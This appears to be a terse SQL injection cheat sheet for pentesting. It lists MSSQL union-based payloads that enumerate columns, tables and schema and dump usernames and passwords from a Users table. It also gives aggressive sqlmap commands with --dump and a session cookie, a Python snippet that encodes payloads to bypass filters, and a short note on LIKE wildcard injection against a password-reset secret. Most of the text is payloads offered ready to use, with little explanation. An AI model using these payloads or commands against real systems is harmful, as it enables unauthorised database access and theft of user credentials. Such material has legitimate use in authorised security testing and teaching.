SQL Injection
MSQL
Test
' or 1=1-- -
Identify number columns
Increase from 1 (column)
' order by 1-- -
Until error or different content ' order by 7-- -
Confirm number columns
' union select 1,2,@@VERSION,DB_NAME(),5,6-- -
Get tables
' union select 1,2,table_name,4,5,6 FROM INFORMATION_SCHEMA.TABLES-- -
Get columns from table Users
' union select 1,2,name,4,5,6 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Users')-- -
Dump data from table Users
' union select 1,2,username,password,4,5 FROM Users-- -
SQLMAP
Use file
sqlmap -r file.txt --batch --level 5 --risk 3
Post request
sqlmap -u 'https://website/page.php' -X POST --data 'action=edit&id=3' --cookie="abcdefg12345" --batch --dump --level 5 --risk 3
Bypass
Encoding payload using utf-16
user_input = input('> ').strip()
utf = [f"\\u00{ord(i):02x}" for i in user_input]
print(''.join(utf))
SQL "LIKE" Wildcard Injection
This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.
Types of Wildcards
-
%
: Equivalent to any string of zero or more characters. -
_
: Equivalent to any single character.
Vulnerability
An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:
SELECT text FROM table WHERE secrets LIKE '$secret'
Even if the $secret
parameter is sanitized to prevent SQL injection, wildcards can still be injected:
http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________
"_" are the chars that match the wildcard